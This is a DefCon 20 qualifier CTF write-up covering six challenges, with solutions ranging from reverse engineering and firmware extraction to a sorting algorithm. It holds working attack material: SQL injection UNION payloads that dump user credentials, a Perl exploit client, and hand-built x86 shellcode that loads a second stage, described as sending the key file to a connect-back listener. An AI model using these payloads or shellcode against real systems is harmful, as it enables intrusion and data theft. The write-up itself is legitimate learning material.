DefCon Quals 20

Thanks to Will (bspar), Dan (macrotis), Ben (strudles) and Joe (selir) for the writeups below


+++++++++++++++++++++++++++++++++++++++++++ Binary 100 +++++++++++++++++++++++++++++++++

Upon loading the sshd program into IDA, locating the section where
the program writes data to the mac.h file shows a character string
variable(labeled by IDA as abuff) being written to the file.  If
you search for where the string is being accessed, you find that 
it is accessed by the function auth_password.  Inside this function,
the abuff variable gets defined as:
	"pass_from: %s \tuser: %s \tpass: %s\n"

Then, shortly after abuff is defined, there is a loop in the code
that goes through every character in abuff and performs a not
operation on it.  After the not, the program fwrites abuff to the
mac.h file and then calls fclose.

With this information, it is obvious that the mac.h file contains
bitflips of the string abuff. Performing a bitflip on the mac.h
file that is given in the challenge provides this:

	SSH2_OUT: 192.168.88.61 	user: root 	pass: foobar 	(ddtek.biz)
	SSH2_OUT: 192.168.88.61 	user: root 	pass: f00bar 	(ddtek.biz)
	SSH2_OUT: 192.168.88.61 	user: root 	pass: mypassw0rd 	(ddtek.biz)
	SSH2_OUT: 10.0.2.15 	user: root 	pass: supr3m3p0w3r 	(defcon.org)
	pass_from: 10.0.2.15 	user: root 	pass: supr3m3p0w3r 	(defcon.org)
	SSH2_OUT: 192.168.88.151 	user: emily 	pass: l0v3ly
	SSH2_OUT: 192.168.88.151 	user: emily 	pass: w0nd3rful
	SSH2_OUT: 192.168.88.151 	user: emily 	pass: n0pa$$w0rd
	pass_from: 192.168.88.151 	user: emily 	pass: l0v3ly 	(hackeruniversity.edu)
	pass_from: 192.168.88.61 	user: feather 	pass: l1ght3rthand1rt 	(ddtek.biz)
	pass_from: 192.168.88.61 	user: feather 	pass: wh@tsmypa$$ 	(ddtek.biz)
	pass_from: 192.168.88.61 	user: feather 	pass: justw@it 	(ddtek.biz)
	pass_from: 192.168.88.61 	user: feather 	pass: ohmygoD 	(ddtek.biz)
	pass_from: 192.168.88.61 	user: feather 	pass: l1ght3rthand1rt 	(ddtek.biz)
	pass_from: 192.168.88.61 	user: emily 	pass: l0v3ly 	(ddtek.biz)

The key to the challenge was found in the only entry for defcon.org,
with the key being the pass.

	SSH2_OUT: 10.0.2.15 	user: root 	pass: supr3m3p0w3r 	(defcon.org)
	pass_from: 10.0.2.15 	user: root 	pass: supr3m3p0w3r 	(defcon.org)

In short, the key can be revealed running this and then cat'ing the result.

	python -c 'f = open("mac.h", "r").read(); fout = open("result", "w"); fout.write("".join([chr(ord(c)^255) for c in f])); fout.close()'
	
++++++++++++++++++++++++++++++++++++++++++ Binary 200 +++++++++++++++++++++++

Info: Joe solved. It was implementing the Tangle hash.

The binary started off expecting four 4-byte integers as input. Once you got past this 'challenge', it requested another 4-byte integer which was subsequently used as the length for two read()'s. The buffers from these read()'s were passed into some function which returned a value.

The output value from that function was checked for each of the buffers and if it matched, you got the key. The function was rather convoluted but it contained an array of integers which appeared to be something cryptographic or at least that block was used in operations over the input buffer. A quick google-ing for one of those integers (558a6467) yielded this link: Tangle Hash paper. And, sure enough this file contained the rest of those integers which were part of the Tangle hash's initial values.

Since the input of this Tangle function was two buffers and the output of that function was checked to see if it was the same, this is obviously looking for a hash collision. So, a bit more googling for Tangle collisions turned up a report untangle which contained a link to a proof-of-concept program called 'untangle' which generated hash collisions. After downloading that code (and the actual tangle code which was required as part of untangle), you could run the untangle program for a given hash length (256 in our case, and the default for untangle) and get two strings which would lead to a Tangle collision. Feeding in those as our two buffers resulted in the hash outputs being the same and we were provided the key.

Here's the exploit code:

#!/usr/bin/perl

use IO::Socket;

my $sock = new IO::Socket::INET (
        PeerAddr => '140.197.217.155',
        PeerPort => '18703',
        Proto => 'tcp',
);

# send 4 required ints
print $sock "\x94\xa4\xc2\x65\xfe\x73\x2d\x6f\xee\xf8\x14\xcb\x6e\xc8\xa1\x26";
# send length of next two buffers
print $sock "\x28\x00\x00\x00";
# send the two strings which Tangle-hash to the same value
print $sock "\xc8\x19\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00";
print $sock "\xc8\x19\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80";

# read the key
while (<$sock>) {
        print $_;
}

Key: 437f085141d357c5d28850d5119aacb5 


++++++++++++++++++++++++++++++++++++++++++ grab bag 400 +++++++++++++++++++++


Challenge: What is Jeff Moss' checking account balance?

Look around the website real quick, and you notice that the zip code field is injectable. Not only that - error messages are displayed too! How kind :)

The first injection I used to check out the structure of the query:

12345 OR 1=1--

And look, that displays all the branches! That's convenient. Just for sh1ts and giggles, let's build off of that so that we can verify that at least some of the command is working at all times (it should at LEAST display all the branches OR an error). Now let's find out what tables and columns we have...

12345 OR 1=1 UNION SELECT table_name, column_name FROM information_schema.COLUMNS--

Well it looks like the table of branches has more than two columns (duh). So let's account for that:

12345 OR 1=1 UNION SELECT table_name, column_name, NULL, NULL, NULL, NULL FROM information_schema.COLUMNS--

Oh hey! We get a nice juicy listing of tables and columns. This is easy, let's get some login info, that's always fun:

12345 OR 1=1 UNION SELECT firstname, lastname, username, password, NULL, NULL FROM customer--

Aww, Jeff Moss isn't there... But there is another person with the last name Moss, let's login as them and see if their balance works. Yep, 0.00 is the flag. It looks like every account has 0.00 checking account balance, so it really doesn't matter who was chosen. Well that was easy.                                      
                                                                     
                                             
++++++++++++++++++++++++++++++++++++++++++ urandom 300 +++++++++++++++++++++

Solved using
- Ruby 1.9.2

Solution:
class IndexedValue
    attr_accessor :idx, :val
    def initialize(i, v)
        self.idx = i
        self.val = v
    end

    def to_s
        "#{idx}: #{val}"
    end
end

class SwapSpec
    attr_accessor :src, :dst
    def initialize(s, d)
        self.src = s
        self.dst = d
    end

    def to_s
        "#{src},#{dst}"
    end
end

def gen_swap_specs(arr)
    working = []
    sorted = []
    ans = []

    arr.each_index do |i|
        working << IndexedValue.new(i, arr[i])
    end

    sorted = working.sort do |a, b| a.val <=> b.val end

    sorted.each_index do |i|
        oldi = sorted[i].idx
        ans << SwapSpec.new(oldi, i)
        working[oldi] = working[i]
        working[oldi].idx = oldi
    end

    return ans
end

...

ans = gen_swap_spec(input)
ans.each do |s|
    sock.print(s.to_s + "\n")
end

Details:
The description of urandom 300 suggested that this was on par with the end-term exam for Stanford's online algorithms course. DDtek being what it is, we can't necessarily assume that much, but one thing is certain: This will be a programming challenge.

Connecting to the given IP address over the given TCP port first prompts you for a password, which itself is given. Inputting the password dumps what appears to be nothing but unprintable binary data, but when we analyzed a capture of the data, there were several lines of instructions giving us the actaul details of the challenge.

The binary dump following the instructions was a set of 100,000 16-bit little-endian integers in random order. Our task was to generate a plan for sorting the set in a sufficiently small amount of swaps within the set, each delimited by a newline, in under 10 seconds, and report back to the server. If this task was completed correctly, the server would respond with the key.

The solution that immediately comes to mind is to modify a sorting algorithm to keep track of all the swaps it makes. But, since we have a hard limit on how many swaps we can actually perform, this eliminates the possiblity of using several sorting algorithms (bubble sort, insertion sort, quicksort, they're all out, because they perform too many swaps in their normal operation). The "natural" solution, then, is to use selection sort.

Selection sort works by first scanning the entire set for the minimum value, then placing it at the beginning of the set, and recursing until the entire set has been traversed. This performs, at worst, N swaps for an array of size N, so it's exactly what we're looking for. The code would look something like this:

tmp = arr.clone
ans = []
for i in 0..(tmp.length - 1) do
    mindex = i
    for j in i..(tmp.length - 1) do
        if tmp[j] < tmp[mindex] then mindex = j end
    end
    t = tmp[i]
    tmp[i] = tmp[mindex]
    tmp[mindex] = t
    ans << SwapSpec.new(mindex, i)
    end
return ans

There are only two problems with it, and they're pretty big problems that compound each other: 1. Ruby is slow 2. Selection sort is slow. This algorithm takes 605.6s on a Core i7 2630QM, which is way, way too long to actually solve the challenge, since the set of integers changes on every connection. A better solution was needed to solve this in time.

There was a possibility of solving it in C, and several other teams did end up solving the challenge with selection sort by writing it in C and compiling the code with the most optimizations possible, but I had a better idea that could easily be implemented in Ruby. What if we knew where the integers were going to be /after/ they were sorted, and work from there?

In order to make this arrangement work, each integer would have to be stored alongside its original index in the array, so when it came time to swap out integers, the source and the destination would be known independent of the actual sorting algorithm, encoded in the position in the given struct. The solution was to introduce a class to do just that:

class IndexedValue
    attr_accessor :idx, :val
    def initialize(i, v)
        self.idx = i
        self.val = v
    end

    def to_s
        "#{idx}: #{val}"
    end
end

There's one more consideration for this, and it's inherent in selection sort: at all times, every index must be valid. So we actually have to swap the elements while running the algorithm, to ensure that any element later on in the sorted set has an index value pointing to its position at that point in the algorithm. So we copy over the given set of integers to another one, each also wrapped with IndexedValues, and initialize a third set as the results of sorting the second set by values. This way, the value originally at the sorted element's new index can be found quickly, and then moved.

Because Ruby is a call-by-value language, sorting an array only moves references to objects, not the objects themselves. So an array of unsorted IndexedValues will have corresponding entries to the same objects in a sorted set of IndexedValues. Any change to an IndexedValue in one set will be reflected in the other. This makes for a very, very fast algorithm. How fast? 0.6s on the same Core i7, still in Ruby. Here's the final algorithm, once more:

def gen_swap_specs(arr)
    working = []
    sorted = []
    ans = []

    arr.each_index do |i|
        working << IndexedValue.new(i, arr[i])
    end

    sorted = working.sort do |a, b| a.val <=> b.val end

    sorted.each_index do |i|
        oldi = sorted[i].idx
        ans << SwapSpec.new(oldi, i)
        working[oldi] = working[i]
        working[oldi].idx = oldi
    end

    return ans
end

All that's left is to handle input and output. The "final program" will look a little something like this (thanks to vonr1ch for handling all the socket bugs):

class IndexedValue
    attr_accessor :idx, :val
    def initialize(i, v)
        self.idx = i
        self.val = v
    end

    def to_s
        "#{idx}: #{val}"
    end
end

class SwapSpec
    attr_accessor :src, :dst
    def initialize(s, d)
        self.src = s
        self.dst = d
    end

    def to_s
        "#{src},#{dst}"
    end
end

def gen_swap_specs(arr)
    working = []
    sorted = []
    ans = []

    arr.each_index do |i|
        working << IndexedValue.new(i, arr[i])
    end

    sorted = working.sort do |a, b| a.val <=> b.val end

    sorted.each_index do |i|
        oldi = sorted[i].idx
        ans << SwapSpec.new(oldi, i)
        working[oldi] = working[i]
        working[oldi].idx = oldi
    end

    return ans
end

def service_interact
    nums = []
    sock = TCPSocket.new("140.197.217.155", 5601)
    sock.recv(10) # recv "Password: "
    sock.write("d0d2ac189db36e15\n")
    start_time = Time.now
    #    sock.close_write
    # Info for the challenge. 1000000 uint16_ts coming our way after this.
    sock.recv(504)
    
    # Read all the uint16_ts
    moarnums = ""
    while (moarnums.size < 200000) do
         moarnums << sock.recv(4096)
    end
    nums = moarnums.unpack("S*")
    
    net_time = Time.now
    puts "Got #{nums.length} uint16_ts in #{net_time - start_time}s"

    begin
        # sort nums        
        ans = gen_swap_specs(nums)
        compute_time = Time.now
        puts "Computed #{ans.length} swaps for #{nums.length} uint16_ts in #{compute_time - net_time}s"
        # send the swap info back
        ans.each do |s|
            sock.print(s.to_s + "\n")
        end
        sock.print("\n")
        send_time = Time.now
        puts "Sent #{ans.length} swaps for #{nums.length} uint16_ts in #{send_time - compute_time}s"
        puts "Spent #{send_time - start_time}s on this job. Key incoming."
        
        # collect the key
        sock.readlines.each do |s|
            puts "Sender replied: " + s
        end
    end
end

service_interact                                     
                                             
+++++++++++++++++++++++++++++++++++++++++++ forensics 300 +++++++++++++++++++++++++++++++

Solved using
- hexdump
- binwalk
- dd
- unsquashfs_lzma (version 4.0, provided by firmware-mod-kit)

Solution:
[macrotis@junebug dlink]$ pwd
$DEFCON_DIR/squashfs-root/home/dlink
[macrotis@junebug dlink]$ cat key.txt
ewe know, the sh33p always preferred Linksys

Details:
Forensics 300 came to us by way of a great big binary dump, the likes of which "file" is not aware on either Fedora 17 or OS X 10.7. Further investigation was required, so the very first thing I did was look at the data at the beginning.

[macrotis@junebug Defcon 20 Quals]$ hexdump -C f300 | head -n 25
00000000  5e a3 a4 17 00 00 00 20  00 00 00 00 73 69 67 6e  |^...... ....sign|
00000010  61 74 75 72 65 3d 77 72  67 6e 64 30 38 5f 64 6c  |ature=wrgnd08_dl|
00000020  6f 62 5f 64 69 72 38 31  35 00 00 00 5e a3 a4 17  |ob_dir815...^...|
00000030  00 00 00 24 00 38 e0 20  70 e0 30 e2 5e 2a ff 77  |...$.8. p.0.^*.w|
00000040  7e ef 84 66 08 c3 9b 2b  64 65 76 3d 2f 64 65 76  |~..f...+dev=/dev|
00000050  2f 6d 74 64 62 6c 6f 63  6b 2f 32 00 74 79 70 65  |/mtdblock/2.type|
00000060  3d 66 69 72 6d 77 61 72  65 00 00 00 5d 00 00 00  |=firmware...]...|
00000070  02 b4 e7 2d 00 00 00 00  00 00 4e 03 fc 00 8c 66  |...-......N....f|
00000080  f8 58 2f a1 b8 d4 a5 bf  31 9b 56 ad 7e 8f ad 62  |.X/.....1.V.~..b|
00000090  75 bc 8a 42 ed 6b c3 47  84 61 d9 f2 5f af e5 df  |u..B.k.G.a.._...|
000000a0  ce d2 7e a8 e9 d4 8f 3b  de 6e 4d 43 df 78 ef 0c  |..~....;.nMC.x..|
000000b0  72 ef 0a 14 af b4 bf 53  11 17 53 fc 9a 46 e4 08  |r......S..S..F..|
000000c0  f8 3b b0 95 22 92 00 d0  9f 30 59 dc 33 e7 9e 75  |.;.."....0Y.3..u|
000000d0  71 be e4 4a 77 81 ea 9e  0b e7 9f e4 2b fc da 05  |q..Jw.......+...|
000000e0  aa 94 7b 20 10 33 3d d9  8f 8b 46 23 c9 fc f2 72  |..{ .3=...F#...r|
000000f0  da a7 5a 95 ae 58 43 ca  a4 5e fb 0b bd 7f c9 01  |..Z..XC..^......|
00000100  01 16 c7 18 92 ec ac a4  d6 55 11 6a 94 f7 db 9d  |.........U.j....|
00000110  ec 62 25 54 53 d4 3b ae  98 31 e7 4c 61 26 a4 32  |.b%TS.;..1.La&.2|
00000120  56 17 18 72 fe f1 9e 8b  6e ee 06 e5 f4 fa 8f e8  |V..r....n.......|
00000130  ed a9 33 cd 70 bc cc 09  7b ac 63 00 6e 36 d6 0c  |..3.p...{.c.n6..|
00000140  54 02 e1 8a c4 75 b8 9f  6c 32 aa 8a b0 a9 ad 45  |T....u..l2.....E|
00000150  af 92 46 fd c7 6e 20 86  bc ad e4 dd b2 79 3b 0d  |..F..n ......y;.|
00000160  75 94 ef b7 8e 60 0f c5  e8 13 ae ae 99 ba 3d d3  |u....`........=.|
00000170  fb 4c c4 47 3d c9 bb 2d  71 71 ea aa b7 d2 48 51  |.L.G=..-qq....HQ|
00000180  f9 26 89 c4 5f d8 6f da  a8 fb 42 bd f9 a1 77 90  |.&.._.o...B...w.|

Hmm. signature=wrgnd08_dlob_dir815? dev=/dev/mtdblock/2? type=firmware? Looks an awful lot like router firmware to me, and I'm guessing D-Link. A quick search of the "dev" string lands me on this OpenWRT page: http://wiki.openwrt.org/toh/d-link/dir-645. Unfortunately, the tools I need to extract this image are apparently only generated when you compile OpenWRT, and I didn't want to do that. So I went and searched for leads on D-Link's proprietary firmware format, SEAMA, and came up empty-handed. A more general search led me to the firmware-mod-kit package, available at code.google.com/p/firmware-mod-kit/.

Unfortunately, using the tools documented immediately in the package would not work at all on the file. Some leads indicated that SEAMA had a SquashFS image in the file somewhere, and the real trick would be getting that out.

More research led me to a tool called "binwalk", available at https://code.google.com/p/binwalk/. Binwalk is a lot like scalpel, except it doesn't support many formats and it doesn't actually extract anything. Running binwalk on the file gave an offset of what appeared to be a SquashFS filesystem. All I had to do was extract it.

[macrotis@junebug Defcon 20 Quals]$ binwalk f300

DECIMAL   	HEX       	DESCRIPTION
-------------------------------------------------------------------------------------------------------
108       	0x6C      	LZMA compressed data, properties: 0x5D, dictionary size: 33554432 bytes, uncompressed size: 3008436 bytes
983148    	0xF006C   	PackImg Tag, little endian size: 14690560 bytes; big endian size: 2744320 bytes
983180    	0xF008C   	Squashfs filesystem, little endian, version 4.0, size: 724610815 bytes, 1470 inodes, blocksize: 0 bytes, created: Sat Mar  6 06:29:04 1993

[macrotis@junebug Defcon 20 Quals]$ dd if=f300 of=f300_dump bs=1 count=724610815 skip=983180
3842188+0 records in
3842188+0 records out
3842188 bytes (3.8 MB) copied, 3.0306 s, 1.3 MB/s
[macrotis@junebug Defcon 20 Quals]$ file f300_dump
f300_dump: Squashfs filesystem, little endian, version 4.0, 2857099 bytes, 1470 inodes, blocksize: 131072 bytes, created: Wed May 30 17:26:52 2012

The resulting file was, indeed, a SquashFS filesystem, supposedly version 4.0. Alas, the unsquashfs shipped with Fedora wouldn't work.

[macrotis@junebug Defcon 20 Quals]$ unsquashfs f300_dump
Parallel unsquashfs: Using 2 processors
lzma uncompress failed with error code 9
read_block: failed to read block @0x2b8d25
read_fragment_table: failed to read fragment table index
FATAL ERROR aborting: failed to read fragment table

In addition to using a proprietary firmware container, D-Link /also/ uses a proprietary variant of SquashFS. Modern versions can support lzma just fine, but D-Link is using a variant that the standard tools can't understand. So, what was I to do?

As it turns out, firmware-mod-kit provided the solution at $SRCDIR/trunk/trunk/src/others/squashfs-4.0-lzma/, the unsquashfs_lzma binary. Using it successfully extracted the filesystem for further analysis.

[macrotis@junebug Defcon 20 Quals]$ ~/Projects/firmware-mod-kit-read-only/trunk/trunk/src/others/squashfs-4.0-lzma/unsquashfs_lzma f300_dump
Parallel unsquashfs: Using 2 processors
1376 inodes (1415 blocks) to write

[=|                                                            ]   46/1415   3%
create_inode: could not create character device squashfs-root/dev/console, because you're not superuser!
[=|                                                            ]   46/1415   3%
create_inode: could not create character device squashfs-root/dev/cua/0, because you're not superuser!
...
create_inode: could not create character device squashfs-root/dev/zero, because you're not superuser!
[==========================================================\   ] 1349/1415  95%
created 1166 files
created 94 directories
created 144 symlinks
created 0 devices
created 0 fifos
[macrotis@junebug Defcon 20 Quals]$ ls squashfs-root/
bin  dev  etc  home  htdocs  lib  mnt  proc  sbin  sys  tmp  usr  var  www
[macrotis@junebug Defcon 20 Quals]$

The actual key was in a somewhat obvious place, home/dlink/key.txt, and the contents read "ewe know, the sh33p always preferred Linksys" (thanks to hi117 for finding the key quickly when given a useable filesystem).

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ Pwn 300 +++++++++++++++++++++++++++++++++++++++++

Pwn300 is a fairly small binary with a mean streak. It starts off like many of the other binaries in this quals by needing to be fed a specific string (3c56bc31268ac65f in this case) before it will allow you to proceed to the real challenge. Next, it reads in up to 0x400 bytes of data, zero's out whatever of that remaining 0x400 byte buffer you didn't use, calls a function at sub_08048a00 and then conveniently calls your buffer. So, it can't get much simpler. Feed in your shellcode and pwn300 will run it for you.

However, the problem is what's done to your buffer by sub_08048a00. This nasty little function treats your buffer as an array of 4-byte integers and then recursively sorts them into increasing numeric order. So, the trick is to write custom shellcode which when sorted still ends up being in the same order you originally coded. This is basically an exercise in learning x86 opcodes and creative ways to accomplish your task using carefully chosen operations.

As the shellcode gets longer, it is increasingly difficult to write something useful that will end up in sorted order. So, you want to write very compact code. One way to do this is to implement a simple read() syscall that will read the rest of your shellcode onto the stack and jump to it. The read() syscall is fairly straight forward on BSD. You need the following items pushed onto the stack: read syscall number (3), the file descriptor to read from (aka your socket which is often FD 4 for simple ctf programs), the buffer address you'd like to read into, and the number of bytes to read.

So, your shellcode might look like:

BITS 32
push 0x7f       ; read up to 127 bytes
push 0xbfbfe900 ; or some other known memory addr on the stack
push 0x4        ; file descriptor 4
push 0x3        ; syscall number for sys_read under bsd
int 0x80
move eax, 0xbfbfe900
call eax

If you assemble the above (nasm -o shellcode shellcode.asm), you get (shown as 4-byte chunks for ease of sorting):

687f0000
006800e9
bfbf6804
00000068
03000000
cd80b800
e9bfbfff
d0000000

Obviously if you sort that, you're not going to end up with the same code (remember we're talking about little endian here so the high order bits are on the right). So, cozy up to the x86 Instruction Set Reference and see if you can write yourself some shellcode that will allow you to implement this read. You also might want to check out this rather old opcode map which makes it somewhat easier to find simple instructions and know figure out their opcode values so that you can pick ones which sort well.

As a hint, think about convenient ways to perform nop's. Obviously, there's the normal 0x90. But, that's a pretty high number. So if you use that as the high-order byte of one of your 4-byte words, it ties your hands a bit for any subsequent words. Perhaps there are other instructions which are lower numbers, but which don't hurt anything in your shellcode if you use them? Maybe some single-byte opcodes??? It took me 28 bytes of total shellcode to implement my read. It can probably be done better. So, try it out yourself.

Here's the assembly I ended up using:

BITS 32
xor eax,eax            ; zero out eax
inc eax                ; take advantage of the low number 'inc eax' opcode as filler
inc eax                ; same
sub esp, byte 0x7f     ; move the stack pointer up a bit to give us some room for our new shellcode
inc eax                ; again, use low number opcode as filler
push byte 0x7f         ; push the number of bytes to read() onto the stack
nop                    ; nop for filler
inc eax                ; now eax=4 (our file descriptor)
push esp               ; push the addr where read() will put its data 
push eax               ; push the file descriptor
dec eax                ; decrement eax back to 3 for the syscall number
push eax               ; push the syscall number onto the stack
int 0x80               ; do the syscall
pop eax                ; pop our way back to the stack addr we pushed earlier
pop eax
pop eax                ; now eax contains the addr of our shellcode
inc eax                ; increment eax to get past some garbage that was left on the stack
nop
inc eax                ; more garbage
call eax               ; call eax to run your newly read in code

This looks unnecessarily complicated. But each instruction was carefully chosen so that the resulting machine code would be sorted into ascending order. For example, the “inc eax” (\x40) instructions had a nice low opcode so they made great high-order byte values for the first few words. This is the resulting machine code:

\x31\xc0\x40\x40
\x83\xec\x7f\x40
\x6a\x7f\x90\x40
\xff\xf4\x50\x48
\x50\xcd\x80\x58
\x58\x58\x40\x90
\x40\xff\xd0\xff

Interestingly, I ended up coding this by hand rather than using nasm and because of that I used “ff d4” for “push esp” rather than the shorter “54” opcode. So, if you use nasm to assemble the above code, your resulting machine code will likely be slightly different. Also, note that the final \xff on the end of the last word really isn't part of the assembled shellcode. When the shellcode runs, the “call eax” (\xff\xd0) instruction will never return, so it doesn't matter what we put into that final byte and I needed it to sort to the last word in the list, so I chose 0xff.

As you can see the 4-byte words are in sorted order. The order won't be changed by the sorting function. Once this shellcode is executed, it will read up to an additional 0x7f bytes onto the stack and then call that code. The additional 0x7f bytes I sent simply opened the “key” file, opened a TCP connect back to my machine (where netcat was listening), and wrote the contents of that key file to that TCP connection.

Key: ddc148610e2c74ac10106e0f35f45416a67bacbb